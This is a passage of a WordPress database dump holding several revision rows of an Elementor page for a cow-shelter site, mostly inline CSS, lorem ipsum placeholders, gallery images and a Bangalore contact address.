<br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 15:27:14','2022-10-10 09:57:14','',1373,'https://gopalak.in/?p=1546',0,'revision','',0),(1547,1,'2022-10-10 15:27:14','2022-10-10 09:57:14','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 15:27:14','2022-10-10 09:57:14','',1373,'https://gopalak.in/?p=1547',0,'revision','',0),(1548,1,'2022-10-10 16:41:24','2022-10-10 11:11:24','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 16:41:24','2022-10-10 11:11:24','',1373,'https://gopalak.in/?p=1548',0,'revision','',0),(1549,1,'2022-10-10 16:41:24','2022-10-10 11:11:24','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 16:41:24','2022-10-10 11:11:24','',1373,'https://gopalak.in/?p=1549',0,'revision','',0),(1550,1,'2022-10-10 16:41:24','2022-10-10 11:11:24','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" 